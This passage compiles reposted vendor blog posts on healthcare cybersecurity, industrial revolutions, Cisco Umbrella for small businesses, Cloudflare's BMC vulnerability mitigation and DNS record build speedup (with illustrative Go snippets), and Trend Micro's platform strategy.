  18. Any other characteristic that could uniquely identify the individual

Threat actors favor electronic health records (EHR) or personal health records (PHR) because they’re useful in a wide array of criminal applications, such as identity theft, insurance fraud, extortion and more. Because there are so many ways this data can be used fraudulently, cybercriminals are able to fetch a higher price for it on the dark web. Meanwhile, these illegal actions cause long-term financial and mental stress for those whose information has been stolen.

Even though we have well-funded, fully equipped anti-hacking agencies across international jurisdictions, cybercriminals can still act with impunity and without fear of getting caught. With hacking tactics, techniques and procedures (TTPs) evolving and getting better at evading detection, healthcare facilities can no longer risk having inadequate or unprepared defensive capabilities.

For many of those who have been caught flat-footed, the impact on affected patients, providers and payers has been catastrophic. Besides the risks that data breaches pose to healthcare delivery organizations (HDOs), they can also dramatically affect facilities’ ability to provide lifesaving care. In a recent Ponemon Institute report, 36 percent of surveyed healthcare organizations said they saw more complications from medical procedures, and 22 percent said they experienced increased death rates, due to ransomware attacks.

When lives depend on the availability of the healthcare system, healthcare cybersecurity must do more and better to ensure patient safety and anytime, anywhere care.

How SonicWall Can Help

For the past three decades, SonicWall has worked with providers to help build a healthier healthcare system. During this time, our innovations have allowed us to meet new expectations regarding improving security, increasing operation efficiencies and reducing IT costs.

Today, SonicWall works with each organization individually to establish a comprehensive defense strategy that matches their business goals and positions care professionals for success. By leveraging our depth and breadth of experience in healthcare industry operations and processes, SonicWall helps HDOs avoid surprises and spend more time focused on their primary mission: ensuring the health and well-being of the communities they serve.

The journey from “I think I’m secured” to “I’m sure I’m secured” starts with the SonicWall Boundless Cybersecurity approach. This approach binds security, central management, advanced analytics and unified threat management across SonicWall’s entire portfolio of security solutions to form the Capture Cloud Platform. The architectural diagram in Figure 3 shows how SonicWall network, edge, endpoint, cloud, wireless, zero trust access, web, email, mobile and IoT security solutions come together as one security platform.

[Figure 3: The SonicWall Capture Cloud Platform architecture]

With the SonicWall Capture Cloud Platform, HDOs can do more and better by composing a custom, layered defense strategy to fit their specific needs, or by deploying the entire stack to establish a consistent security posture across their critical infrastructure. Combining these security solutions gives HDOs the necessary layered defense, along with a security framework for central governance, risk management and compliance with data protection laws.

Download SonicWall’s Boundless Cybersecurity for a Safer Healthcare Industry white paper to discover how to strengthen healthcare cybersecurity, making patient care delivery more efficient, resilient and secure.

Source :
https://blog.sonicwall.com/en-us/2022/05/why-healthcare-must-do-more-and-do-better-to-ensure-patient-safety/

Cybersecurity in the Fifth Industrial Revolution

Join a discussion about how rapid changes to society and business are pushing the development of better, more effective cybersecurity.

Think about your life without computers and the other digital devices we now take for granted. If you took inventory, how many devices are in your business, at your home and on your person right at this moment? Now consider the experience of earlier generations: their entertainment, travel, communication, and even simple things like reading a newspaper or a book.

Industrial Revolutions change lives and produce excellent opportunities for growth for individuals and society. We have experienced five so far, with the first starting around 1750 and the fifth rolling out only a few years ago. So we are well experienced in recognizing their implications and absorbing their benefits. We are also experts at evolving through the enormous disruptions they bring.

First and Second Revolutions: The Evolution of Industries

The First Industrial Revolution was the harbinger of a massive wave of innovation. Factories sprang up in major cities, and people began producing more products than ever before. But as productivity increased, the number of jobs decreased, and the living standards of specific segments of society fell hard. Eventually, society (and the economy) filled in with new jobs that serviced fledgling heavy industries. Companies needed more skilled workers to build the machines that made more machines. As a result, high-paying jobs returned, and society recovered.

But then came the Second Industrial Revolution, also known as the Technological Revolution, because it ushered in a phase of rapid scientific discovery and industrial standardization. From the late 19th century through much of the early 20th, mass production transformed factories into conveyors of productivity. As a result, while we endured a new phase of job losses and societal upheavals, we also saw the rise of highly skilled workers and higher-paying jobs that afforded better homes and greater mobility.

Third and Fourth Revolutions: The Evolution of Modern Society

The Third Industrial Revolution began in the later part of the 20th century, as the need for better automation triggered the advent of electronics, then computers, followed by the invention of the internet. Technological advancements began a fundamental economic transformation and, along with it, greater volatility. In addition, new methods of communication converged with rapid global urbanization and new energy regimes such as renewable sources.

Then came the Fourth Industrial Revolution, which some argue ended just before the pandemic. The blaze of technological advancements from the previous period facilitated the introduction of personal computing, mobile devices and the Internet of Things (IoT) – developments that forced us to redefine the boundaries between the physical, digital, and biological worlds. Advancements in artificial intelligence (AI), robotics, 3D printing, genetic engineering, quantum computing, and other technologies added to social pressures that blurred traditional boundaries to the point of confusion.

The Fifth Industrial Revolution: Societal Fusion

Many global thinkers believe we are in the throes of a Fifth Industrial Revolution (also “5IR”) that inaugurated new metrics for productivity that go beyond measuring the output of humans and machines in the workplace. We are witnessing a fusion of human abilities and machine efficiencies in this context. The physical, digital and biological spheres are now interchangeable and intertwined. So, it’s not just about connecting people to machines but also about connecting devices to other machines, all in the name of human creativity and productivity.

One remarkable aspect of 5IR is that it is happening at an unprecedented rate. For example, accelerated by the COVID pandemic, remote network and wireless communication saw an enormous surge as Work-From-Home became a permanent fixture for the Western workforce; thus, workplace and home were fused. And along with that fusion came education and home. But other fusions are more challenging to discern, such as information and misinformation, news and propaganda, political action and terrorism, and so on, which leads us to the fusion between crime and cybersecurity.

Learn and Explore the Impacts of the 5IR and Cybersecurity

Interestingly, a very high percentage of successful ransomware hits are due to people bypassing or ignoring cybersecurity protocols simply because they don’t believe they could ever become a victim. Unfortunately, the same can be said of organizations that have not yet prioritized updating their security technology. Many owners and managers don’t understand the threats and think that ransomware only happens to bigger companies. Current threat reports prove that the impulse to dodge better cybersecurity is mistaken, and that is the part we are struggling with the most.

The $10.5T question (the estimated cost of cybercrime per year by 2025) is how much effort we will expend to correct this trend. Cybercrime is one of the most complex byproducts of our “revolutions.” As a result of the surge in new threats, technology and behavior are rapidly evolving. Taking responsibility and deploying new cybersecurity technology will help us mitigate today’s risks.

Book your seat to learn more during our next MINDHUNTER #9 episode in June.


Source :
https://blog.sonicwall.com/en-us/2022/05/cybersecurity-in-the-fifth-industrial-revolution/

Cisco Umbrella Named a 2022 SC Awards Finalist for Best SME Security Solution

SC Awards from SC Media are known for honoring the best people, products and companies in cybersecurity. One of the industry’s most respected media outlets, SC Media enlists a select pool of experts from the information security community to review more than 800 entries in 35+ categories.

Last year Cisco Umbrella took home SC’s top award for Best SME Security Solution, and we are thrilled to be a finalist again this year, with the winner to be announced in August.

Small and mid-size enterprises need an effective, easy-to-deploy security solution

We firmly believe small and medium-sized businesses deserve big protection. The chilling statistic that 60% of small- and medium-sized businesses go out of business within six months of a cyberattack underscores the need for an effective, easy-to-implement security solution for companies that are likely to have little or no dedicated IT staff.

Blocking threats before they reach the network, endpoints, and end users, Umbrella enables even small IT teams to monitor and respond to threats effectively – like it does for Cape Air.

Cape Air uses Cisco Umbrella to simplify operations and improve security

Headquartered in Hyannis, Massachusetts, Cape Air is a regional airline that provides service to some of the world’s most beautiful destinations. But when frequent malware infections disrupt core services and the customer experience, brand reputation suffers. For Cape Air, service delays due to malware infections had become a common challenge.

Brett Stone, Cape Air’s network operations manager, needed to stop threats before they caused service outages. He recognized that Cisco Umbrella could help Cape Air reduce infections, since it blocks malware, phishing, command-and-control requests, and other threats at the DNS layer before a connection is even established.

He configured Umbrella within 30 minutes — and saw immediate results:

“From the moment we deployed Umbrella, it was like night and day in the number of tickets we had open because of infections and PCs that kept getting compromised in the past. We were amazed because the next day we didn’t have to fix these problems anymore. Then we could do all those other things that were important to us; we finally had time for them.” – Brett Stone

Stone recalls how malware remediation used to consume all of Cape Air’s network technicians’ time. “Before Umbrella, I had three technicians working 40 hours a week, and all they did for a year was fix malware infections and reimage computers,” Stone recalls. “Thankfully, those days are gone. Now we have zero, or rarely one, malware infection. I don’t remember the last time something got through Cisco Umbrella within the last year or two.”

Want to learn more about how Cisco Umbrella serves small-to-midsize businesses?

Threats are never going to stop coming. But with simple deployment and powerful protection, visibility, and performance, Cisco Umbrella can provide the big protection you need.

Check out our ebook Big Threats to Small Business to learn more about how we meet the unique cybersecurity needs of small and medium-sized businesses. And if you’re ready to see our solution in action, check out a free Cisco Umbrella Live Demo.

Source :
https://umbrella.cisco.com/blog/cisco-umbrella-named-2022-sc-awards-finalist-best-sme-security-solution

Cloudflare’s approach to handling BMC vulnerabilities

In recent years, management interfaces on servers like a Baseboard Management Controller (BMC) have been the target of cyber attacks including ransomware, implants, and disruptive operations. Common BMC vulnerabilities like Pantsdown and USBAnywhere, combined with infrequent firmware updates, have left servers vulnerable.

We were recently informed by a trusted vendor of new, critical vulnerabilities in popular BMC software that we use in our fleet. Below is a summary of what was discovered, how we mitigated the impact, and how we look to prevent these types of vulnerabilities from having an impact on Cloudflare and our customers.

Background

A baseboard management controller is a small, specialized processor used for remote monitoring and management of a host system. The processor has multiple connections to the host system, giving it the ability to monitor hardware, update BIOS firmware, power cycle the host, and more.

Access to the BMC can be local or, in some cases, remote. With remote vectors open, there is potential for malware to be installed on the BMC from the local host via PCI Express or the Low Pin Count (LPC) interface. With compromised software on the BMC, malware or spyware could maintain persistence on the server.

According to the National Vulnerability Database, the two BMC chips (ASPEED AST2400 and AST2500) have implemented Advanced High-Performance Bus (AHB) bridges, which allow arbitrary read and write access to the physical address space of the BMC from the host. This means that malware running on the server can also access the RAM of the BMC.

These BMC vulnerabilities are sufficient to enable ransomware propagation, server bricking, and data theft.

Impacted versions

Numerous vulnerabilities were found to affect the QuantaGrid D52B cloud server due to vulnerable software found in the BMC. These vulnerabilities are associated with specific interfaces that are exposed on AST2400 and AST2500 and explained in CVE-2019-6260. The vulnerable interfaces in question are:

  • iLPC2AHB bridge Pt I
  • iLPC2AHB bridge Pt II
  • PCIe VGA P2A bridge
  • DMA from/to arbitrary BMC memory via X-DMA
  • UART-based SoC Debug interface
  • LPC2AHB bridge
  • PCIe BMC P2A bridge
  • Watchdog setup

An attacker might be able to update the BMC directly using SoCFlash through in-band LPC or the BMC debug universal asynchronous receiver-transmitter (UART) serial console. While this might be considered a legitimate recovery path in the event of total corruption, it can also be abused, since SoCFlash will use any open interface for flashing.

Mitigations and response

Updated firmware

We reached out to one of our manufacturers, Quanta, to validate that existing firmware within a subset of systems was in fact patched against these vulnerabilities. While some versions of our firmware were not vulnerable, others were. A patch was released, tested, and deployed on the affected BMCs within our fleet.

Cloudflare Security and Infrastructure teams also proactively worked with additional manufacturers to validate that their BMC firmware was not vulnerable to these vulnerabilities and interfaces.

Reduced exposure of BMC remote interfaces

It is standard practice within our data centers to implement network segmentation to separate different planes of traffic. Our out-of-band networks are not exposed to the outside world and are only accessible within their respective data centers. Access to any management network goes through a defense-in-depth approach, restricting connectivity to jumphosts and requiring authentication and authorization through our zero trust Cloudflare One service.

Reduced exposure of BMC local interfaces

Applications on a host are limited in what they can send to the BMC. This restricts what the host can do to the BMC while still allowing secure in-band updating along with userspace logging and monitoring.

Do not use default passwords

This may sound like common knowledge for most companies, but we follow a standard process of not just changing the default usernames and passwords that ship with BMC software, but also disabling the default accounts so they can never be used. Any static accounts are subject to regular password rotation.

BMC logging and auditing

We log all activity by default on our BMCs. Logs that are captured include the following:

  • Authentication (Successful, Unsuccessful)
  • Authorization (user/service)
  • Interfaces (SOL, CLI, UI)
  • System status (Power on/off, reboots)
  • System changes (firmware updates, flashing methods)

Reviewing these logs, we were able to validate that no malicious activity had occurred.
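To make the auditing step concrete, here is a minimal sketch in Go of the kind of check these logs enable: counting failed BMC authentication attempts per account and flagging outliers. The log format, file path, and alert threshold are all invented for illustration; this is not Cloudflare’s actual tooling.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strings"
)

// Hypothetical audit-log line format (assumed for illustration):
//   2022-05-01T12:00:00Z auth=failure user=admin iface=UI
func main() {
	f, err := os.Open("bmc-audit.log") // assumed log path
	if err != nil {
		panic(err)
	}
	defer f.Close()

	failures := map[string]int{} // failed authentication attempts per user
	sc := bufio.NewScanner(f)
	for sc.Scan() {
		var user string
		failed := false
		for _, field := range strings.Fields(sc.Text()) {
			switch {
			case field == "auth=failure":
				failed = true
			case strings.HasPrefix(field, "user="):
				user = strings.TrimPrefix(field, "user=")
			}
		}
		if failed && user != "" {
			failures[user]++
		}
	}
	if err := sc.Err(); err != nil {
		panic(err)
	}
	for user, n := range failures {
		if n >= 5 { // arbitrary alert threshold
			fmt.Printf("ALERT: %d failed BMC logins for %q\n", n, user)
		}
	}
}
```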

What’s next for the BMC

Cloudflare regularly works with several original design manufacturers (ODMs) to produce the highest-performing, most efficient, and most secure computing systems to our own specifications. The standard processors used for our baseboard management controllers often ship with proprietary firmware that is less transparent and more cumbersome for us and our ODMs to maintain. We believe in improving every component of the systems we operate in over 270 cities around the world.

OpenBMC

We are moving forward with OpenBMC, an open-source firmware for our supported baseboard management controllers. Based on the Yocto Project, a toolchain for Linux on embedded systems, OpenBMC will enable us to specify, build, and configure our own firmware based on the latest Linux kernel feature set, much as we already do with the physical hardware we design with our ODMs.

OpenBMC firmware will enable:

  • Latest stable and patched Linux kernel
  • Internally-managed TLS certificates for secure, trusted communication across our isolated management network
  • Fine-grained credentials management
  • Faster response time for patching and critical updates

Because many of these features are community-driven, vulnerabilities like Pantsdown are patched quickly.

Extending secure boot

You may have read about our recent work securing the boot process with a hardware root of trust, but the BMC has its own boot process that often starts as soon as the system receives power. Newer versions of the BMC chips we use, along with cutting-edge security co-processors, will allow us to extend our secure boot capabilities to before our UEFI firmware loads, by validating cryptographic signatures on our BMC/OpenBMC firmware. By extending our secure boot chain to the very first device that receives power in our systems, we greatly reduce the impact of malicious implants that could be used to take down a server.
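To illustrate the signature check at the heart of such a chain, here is a minimal sketch in Go. It uses Ed25519 purely as a stand-in algorithm; the real key storage, image format, and verification hardware are not described in this post, so every name below is an assumption.

```go
package main

import (
	"crypto/ed25519"
	"fmt"
	"os"
)

// verifyFirmware refuses to proceed unless the image is signed by a trusted key.
// Image layout (assumed for illustration): payload followed by a 64-byte signature.
func verifyFirmware(image []byte, pub ed25519.PublicKey) ([]byte, error) {
	if len(image) < ed25519.SignatureSize {
		return nil, fmt.Errorf("image too short")
	}
	payload := image[:len(image)-ed25519.SignatureSize]
	sig := image[len(image)-ed25519.SignatureSize:]
	if !ed25519.Verify(pub, payload, sig) {
		return nil, fmt.Errorf("signature verification failed")
	}
	return payload, nil
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(nil)    // stand-in for a key held in a root of trust
	payload := []byte("openbmc-firmware-image") // stand-in firmware payload
	image := append(payload, ed25519.Sign(priv, payload)...)

	if _, err := verifyFirmware(image, pub); err != nil {
		fmt.Fprintln(os.Stderr, "refusing to boot:", err)
		os.Exit(1)
	}
	fmt.Println("firmware signature OK, continuing boot")
}
```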

Conclusion

While this vulnerability ended up being one we could quickly resolve through firmware updates from Quanta and quick action by our teams to validate and patch our fleet, we are continuing to innovate through OpenBMC and a secure root of trust to ensure that our fleet is as secure as possible. We are grateful to our partners for their quick action and are always glad to report risks and our mitigations so that you can trust how seriously we take your security.

Source :
https://blog.cloudflare.com/bmc-vuln/

How we improved DNS record build speed by more than 4,000x

Since my previous blog about Secondary DNS, Cloudflare’s DNS traffic has more than doubled from 15.8 trillion DNS queries per month to 38.7 trillion. Our network now spans over 270 cities in over 100 countries, interconnecting with more than 10,000 networks globally. According to w3 stats, “Cloudflare is used as a DNS server provider by 15.3% of all the websites.” This means we have an enormous responsibility to serve DNS in the fastest and most reliable way possible.

Although the response time we have on DNS queries is the most important performance metric, there is another metric that sometimes goes unnoticed. DNS record propagation time is how long it takes for changes submitted to our API to be reflected in our DNS query responses. Every millisecond counts here, as faster propagation lets customers change configuration quickly, making their systems much more agile. Although our DNS propagation pipeline was already known to be very fast, we had identified several changes that, if implemented, would massively improve performance. In this blog post I’ll explain how we managed to drastically improve our DNS record propagation speed, and the impact it has on our customers.

How DNS records are propagated

Cloudflare uses a multi-stage pipeline that takes our customers’ DNS record changes and pushes them to our global network, so they are available all over the world.

At a high level, the steps in this pipeline are:

  1. Customer makes a change to a record via our DNS Records API (or UI).
  2. The change is persisted to the database.
  3. The database event triggers a Kafka message which is consumed by the Zone Builder.
  4. The Zone Builder takes the message, collects the contents of the zone from the database and pushes it to Quicksilver, our distributed KV store.
  5. Quicksilver then propagates this information to the network.

Of course, this is a simplified version of what is happening. In reality, our API receives thousands of requests per second. All POST/PUT/PATCH/DELETE requests ultimately result in a DNS record change. Each of these changes needs to be actioned so that the information we show through our API and in the Cloudflare dashboard is eventually consistent with the information we use to respond to DNS queries.
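To make steps 3 through 5 concrete, here is a toy model of the pipeline in Go. A channel stands in for the Kafka topic and a mutex-guarded map stands in for Quicksilver; all type and function names are invented for illustration, and none of this is the production code.

```go
package main

import (
	"fmt"
	"sync"
)

// ZoneEvent models the Kafka message emitted when a zone changes (step 3).
type ZoneEvent struct{ ZoneID int }

// Quicksilver stands in for the distributed KV store (step 5).
type Quicksilver struct {
	mu   sync.Mutex
	data map[int][]string
}

func (q *Quicksilver) Put(zoneID int, records []string) {
	q.mu.Lock()
	defer q.mu.Unlock()
	q.data[zoneID] = records
}

// fetchZoneFromDB stands in for the database read in step 4.
func fetchZoneFromDB(zoneID int) []string {
	return []string{fmt.Sprintf("example.com. 300 IN A 192.0.2.%d", zoneID)}
}

// zoneBuilder consumes change events and pushes full zone contents to the KV store.
func zoneBuilder(events <-chan ZoneEvent, qs *Quicksilver, done chan<- struct{}) {
	for ev := range events {
		records := fetchZoneFromDB(ev.ZoneID) // step 4: collect the zone contents
		qs.Put(ev.ZoneID, records)            // step 4: push them to Quicksilver
	}
	close(done)
}

func main() {
	qs := &Quicksilver{data: map[int][]string{}}
	events := make(chan ZoneEvent, 8)
	done := make(chan struct{})
	go zoneBuilder(events, qs, done)

	events <- ZoneEvent{ZoneID: 1} // steps 1-3: an API change lands as an event
	close(events)
	<-done
	fmt.Println(qs.data)
}
```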

Historically, one of the largest bottlenecks in the DNS propagation pipeline was the Zone Builder, shown in step 4 above. Responsible for collecting and organizing records to be written to our global network, our Zone Builder often ate up most of the propagation time, especially for larger zones. As we continue to scale, it is important for us to remove any bottlenecks that may exist in our systems, and this was clearly identified as one such bottleneck.

Growing pains

When the pipeline shown above was first announced, the Zone Builder received somewhere between 5 and 10 DNS record changes per second. Although the Zone Builder at the time was a massive improvement on the previous system, it was not going to last long given the growth that Cloudflare was and still is experiencing. Fast-forward to today, we receive on average 250 DNS record changes per second, a staggering 25x growth from when the Zone Builder was first announced.

The way that the Zone Builder was initially designed was quite simple. When a zone changed, the Zone Builder would grab all the records from the database for that zone and compare them with the records stored in Quicksilver. Any differences were fixed to maintain consistency between the database and Quicksilver.

This is known as a full build. Full builds work great because each DNS record change corresponds to one zone change event. This means that multiple events can be batched and subsequently dropped if needed. For example, if a user makes 10 changes to their zone, this will result in 10 events. Since the Zone Builder grabs all the records for the zone anyway, there is no need to build the zone 10 times. We just need to build it once after the final change has been submitted.
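That batching behavior can be sketched as a small coalescing step: drain everything currently queued, then build each distinct zone once. A minimal, illustrative version with invented types (not the production scheduler):

```go
package main

import "fmt"

// ZoneEvent models a zone-change message, as in the sketch above.
type ZoneEvent struct{ ZoneID int }

// coalesce drains every event currently queued and returns the set of zones
// needing one full build each, no matter how many changes each received.
func coalesce(events chan ZoneEvent) map[int]bool {
	zones := map[int]bool{}
	for {
		select {
		case ev := <-events:
			zones[ev.ZoneID] = true
		default: // queue drained
			return zones
		}
	}
}

func main() {
	events := make(chan ZoneEvent, 16)
	for i := 0; i < 10; i++ {
		events <- ZoneEvent{ZoneID: 42} // ten changes to the same zone...
	}
	fmt.Println(len(coalesce(events))) // ...coalesce into 1 build
}
```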

What happens if the zone contains one million records, or ten million? This is a very real problem, because not only is Cloudflare scaling, but our customers are scaling with us. Today our largest zone has millions of records. Although our database is optimized for performance, even one full build containing one million records took up to 35 seconds, largely caused by database query latency. In addition, when the Zone Builder compares the zone contents with the records stored in Quicksilver, we need to fetch all the records from Quicksilver for the zone, adding yet more time. The impact doesn’t stop at that single customer, either: a slow build eats up resources needed by other services reading from the database and slows down the rate at which our Zone Builder can build other zones.

Per-record build: a new build type

Many of you might already have the solution to this problem in your head:

Why doesn’t the Zone Builder just query the database for the record that has changed and propagate just the single record?

Of course, this is the correct solution, and the one we eventually arrived at. However, the road to get there was not as simple as it might seem.

Firstly, our database uses a series of functions that, at zone touch time, create a PostgreSQL Queue (PGQ) event that ultimately gets turned into a Kafka event. Initially, we had no distinction for individual record events, which meant our Zone Builder had no idea what had actually changed until it queried the database.

Next, the Zone Builder is still responsible for DNS zone settings in addition to records. Some examples of DNS zone settings include custom nameserver control and DNSSEC control. As a result, our Zone Builder needed to be aware of specific build types to ensure that they don’t step on each other. Furthermore, per-record builds cannot be batched in the same way that zone builds can because each event needs to be actioned separately.

As a result, a brand new scheduling system needed to be written. Lastly, the Quicksilver interaction needed to be rewritten to account for the different types of schedulers. These issues can be broken down as follows:

  1. Create a new Kafka event pipeline for record changes that contain information about the changed record.
  2. Separate the Zone Builder into a new type of scheduler that implements some defined scheduler interface.
  3. Implement the per-record scheduler to read events one by one in the correct order.
  4. Implement the new Quicksilver interface for the per-record scheduler.

Internally, the new Zone Builder pairs the existing full build scheduler with the new per-record scheduler.

It is critically important that we lock between these two schedulers because it would otherwise be possible for the full build scheduler to overwrite the per-record scheduler’s changes with stale data.
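One plausible shape for this design, with invented names throughout: a common Scheduler interface implemented by both build types, plus a per-zone lock they share so a full build holding stale zone data can never interleave with a per-record write.

```go
package main

import (
	"fmt"
	"sync"
)

// Scheduler is a hypothetical common interface both build types implement.
type Scheduler interface {
	Build(zoneID int)
}

// zoneLocks serializes builds per zone across both schedulers, so a full
// build holding stale zone data cannot overwrite a newer per-record write.
var zoneLocks sync.Map // zoneID -> *sync.Mutex

func lockZone(zoneID int) *sync.Mutex {
	mu, _ := zoneLocks.LoadOrStore(zoneID, &sync.Mutex{})
	return mu.(*sync.Mutex)
}

type fullBuildScheduler struct{}

func (fullBuildScheduler) Build(zoneID int) {
	mu := lockZone(zoneID)
	mu.Lock()
	defer mu.Unlock()
	fmt.Println("full build of zone", zoneID) // rebuilds the entire zone
}

type perRecordScheduler struct{}

func (perRecordScheduler) Build(zoneID int) {
	mu := lockZone(zoneID)
	mu.Lock()
	defer mu.Unlock()
	fmt.Println("per-record build in zone", zoneID) // writes a single record
}

func main() {
	for _, s := range []Scheduler{fullBuildScheduler{}, perRecordScheduler{}} {
		s.Build(1) // both contend on the same per-zone lock
	}
}
```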

It is important to note that none of this per-record architecture would be possible without the use of Cloudflare’s black lie approach to negative answers with DNSSEC. Normally, in order to properly serve negative answers with DNSSEC, all the records within the zone must be canonically sorted. This is needed in order to maintain a list of references from the apex record through all the records in the zone. With this normal approach to negative answers, a single record that has been added to the zone requires collecting all records to determine its insertion point within this sorted list of names.
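A toy example makes the contrast clear: under the conventional approach, proving that a name does not exist requires its lexicographic neighbors, so inserting even one record means locating its position among all existing names. The sketch below (plain lexicographic order, invented names, no DNSSEC details) shows that lookup; black lies remove the need for it entirely.

```go
package main

import (
	"fmt"
	"sort"
)

// With conventional NSEC, proving a name's absence requires its neighbors in
// the canonically sorted zone, so every insert must consult the full name list.
func insertionPoint(sortedNames []string, newName string) int {
	return sort.SearchStrings(sortedNames, newName)
}

func main() {
	zone := []string{"a.example.com", "m.example.com", "z.example.com"}
	i := insertionPoint(zone, "c.example.com")
	fmt.Printf("insert between %q and %q\n", zone[i-1], zone[i])
	// Black lies sidestep this: a negative answer is synthesized per query,
	// so a single record can be written without reading the whole zone.
}
```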

Bugs

I would love to be able to write a Cloudflare blog where everything went smoothly; however, that is never the case. Bugs happen, but we need to be ready to react to them and to set ourselves up so that the same bug cannot happen again.

In this case, the major bug we discovered was related to the cleanup of old records in Quicksilver. With the full Zone Builder, we have the luxury of knowing exactly what records exist in both the database and in Quicksilver. This makes writing and cleaning up a fairly simple task.

When the per-record builds were introduced, record events such as creates, updates, and deletes all needed to be treated differently. Creates and deletes are fairly simple because you are either adding or removing a record from Quicksilver. Updates introduced an unforeseen issue due to the way that our PGQ was producing Kafka events. Record updates only contained the new record information, which meant that when the record name was changed, we had no way of knowing what to query for in Quicksilver in order to clean up the old record. This meant that any time a customer changed the name of a record in the DNS Records API, the old record would not be deleted. Ultimately, this was fixed by replacing those specific update events with both a creation and a deletion event so that the Zone Builder had the necessary information to clean up the stale records.
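The fix is easy to picture as a small event-expansion step, sketched below with invented types: any update event becomes a delete of the old record followed by a create of the new one, so the builder always knows which Quicksilver entry to clean up.

```go
package main

import "fmt"

// RecordEvent is an invented stand-in for the Kafka record-change event.
type RecordEvent struct {
	Op      string // "create", "update", "delete"
	OldName string
	NewName string
}

// expand rewrites an update as a delete of the old record plus a create of
// the new one, so the builder always knows which stale entry to remove.
func expand(ev RecordEvent) []RecordEvent {
	if ev.Op != "update" {
		return []RecordEvent{ev}
	}
	return []RecordEvent{
		{Op: "delete", OldName: ev.OldName},
		{Op: "create", NewName: ev.NewName},
	}
}

func main() {
	ev := RecordEvent{Op: "update", OldName: "old.example.com", NewName: "new.example.com"}
	for _, e := range expand(ev) {
		fmt.Printf("%s old=%q new=%q\n", e.Op, e.OldName, e.NewName)
	}
}
```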

None of this is rocket surgery, but we spend engineering effort to continuously improve our software so that it grows with the scaling of Cloudflare. And it’s challenging to change such a fundamental low-level part of Cloudflare when millions of domains depend on us.

Results

Today, all DNS Records API record changes are treated as per-record builds by the Zone Builder. As I previously mentioned, we have not been able to get rid of full builds entirely; however, they now represent about 13% of total DNS builds. This 13% corresponds to changes made to DNS settings that require knowledge of the entire zone’s contents.

When we compare the two build types, per-record builds are on average 150x faster than full builds. This build time includes both database query time and Quicksilver write time.

From there, our records are propagated to our global network through Quicksilver.

The 150x improvement above is with respect to averages, but what about the 4,000x I mentioned at the start? As you can imagine, as the size of the zone increases, the difference between full build time and per-record build time also increases. I used a test zone of one million records and ran several per-record builds, followed by several full builds. The results are shown in the table below:

Build Type       Build Time (ms)
Per Record #1    6
Per Record #2    7
Per Record #3    6
Per Record #4    8
Per Record #5    6
Full #1          34032
Full #2          33953
Full #3          34271
Full #4          34121
Full #5          34093

We can see that, across the five per-record builds, no build took longer than 8 ms. The full builds, by contrast, averaged around 34 seconds. That is a build time reduction of 4,250x!

Given the full build times for both average-sized zones and large zones, it is apparent that all Cloudflare customers benefit from this improved performance, and the benefit only grows as the size of the zone increases. In addition, our Zone Builder uses fewer database and Quicksilver resources, meaning other Cloudflare systems are able to operate at increased capacity.

Next Steps

The results here have been very impactful, though we think that we can do even better. In the future, we plan to get rid of full builds altogether by replacing them with zone setting builds. Instead of fetching the zone settings in addition to all the records, the zone setting builder would fetch just the settings for the zone and propagate them to our global network via Quicksilver. Like the per-record builds, this is a difficult challenge due to the complexity of zone settings and the number of actors that touch them. Ultimately, if this can be accomplished, we can officially retire full builds and leave them as a reminder in our git history of the scale at which we have grown over the years.

In addition, we plan to introduce a batching system that will collect record changes into groups to minimize the number of queries we make to our database and Quicksilver.

Does solving these kinds of technical and operational challenges excite you? Cloudflare is always hiring for talented specialists and generalists within our Engineering and other teams.

Source :
https://blog.cloudflare.com/dns-build-improvement/

Trend Micro’s One Vision, One Platform

The world moves fast sometimes. Just two years ago, organizations were talking vaguely about the need to transform digitally, and ransomware was just beginning to make headlines outside the IT media circle. Fast forward to 2022, and threat actors have held oil pipelines and critical food supply chains hostage, while many organizations have passed a digital tipping point that will leave them forever changed. Against this backdrop, CISOs are increasingly aware of the cost, operational, and risk implications of running disjointed point products.

That’s why Trend Micro is transforming from a product- to a platform-centric company. From the endpoint to the cloud, we’re focused on helping our customers prepare for, withstand, and rapidly recover from threats—freeing them to go further and do more. Analysts seem to agree.

Unprecedented change

The digital transformation that organizations underwent during the pandemic was, in some cases, unprecedented. It helped them adapt to a new reality of remote and now hybrid working, supply chain disruption, and rising customer expectations. The challenge is that these investments in cloud infrastructure and services are broadening the corporate attack surface. In many cases, in-house teams are drowning in new attack techniques and cloud provider features. This can lead to misconfigurations which open the door to hackers.

Yet even without human error, there’s plenty for the bad guys to target in modern IT environments, from unpatched vulnerabilities to accounts protected with easy-to-guess or previously breached passwords. That means threat prevention isn’t always possible. Instead, organizations are increasingly looking to augment these capabilities with detection and response tooling like XDR to ensure incidents don’t turn into large-scale breaches. It’s important that these tools are able to prioritize alerts: Trend Micro found that as many as 70% of security operations (SecOps) teams are emotionally overwhelmed by the sheer volume of alerts they’re forced to deal with.

SecOps staff and their colleagues across the IT function are stretched to the limit by these trends, which are compounded by industry skills shortages. The last thing they need is to have to swivel-chair between multiple products to find the right information.

What Gartner says

Analyst firm Gartner is observing the same broad industry trends. In a recent report, it claimed that:

  • Vendors are increasingly divided into “platform” and “portfolio” providers—the latter providing products with little underlying integration
  • By 2025, 70% of organizations will reduce to a maximum of three the number of vendors they use to secure cloud-native applications
  • By 2027, half of the mid-market security buyers will use XDR to help consolidate security technologies such as endpoint, cloud, and identity
  • Vendors are increasingly integrating diverse security capabilities into a single platform. Those which minimize the number of consoles and configuration planes, and reuse components and information, will generate the biggest benefits

The power of one

This is music to our ears. It is why Trend Micro has introduced a unified cybersecurity platform, delivering protection across the endpoint, network, email, IoT, and cloud, all tied together with threat detection and response from our Vision One platform. These capabilities help customers optimize protection, detection, and response, leveraging automation across the key layers of their IT environment in a way that leaves no coverage gaps for the bad guys to hide in.

With fewer vendors to manage, a high degree of automation, and better alert prioritization, stretched security teams face fewer overheads and fewer hands-on decisions. Trend Micro’s unified cybersecurity platform vision also includes Trend Micro Service One for 24/7/365 managed detection, response, and support, to augment in-house skills and let teams focus on higher-value tasks.

According to Gartner, the growth in market demand for platform-based offerings has led some vendors to bundle products as a portfolio despite no underlying synergy. This can be a “worst of all worlds,” as products are neither best-of-breed nor do they reduce complexity and overheads, it claims.

We agree. That’s why Trend Micro offers a fundamentally more coherent platform approach. We help organizations continuously discover an ever-changing attack surface, assess risks and then take streamlined steps to mitigate that risk—applying the right security at the right time. That’s one vision, one platform, and total protection.

To find out more about Trend Micro One, please visit: https://www.trendmicro.com/platform-one

Source :
